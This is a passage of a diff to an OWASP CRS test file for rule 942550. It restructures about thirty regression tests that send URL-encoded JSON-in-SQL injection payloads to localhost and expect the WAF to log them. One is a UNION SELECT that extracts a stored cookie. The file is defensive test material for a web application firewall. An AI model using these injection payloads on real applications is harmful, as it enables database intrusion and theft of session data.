"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + 
port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 
942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie 
limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 
'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? 
'1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - 
output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
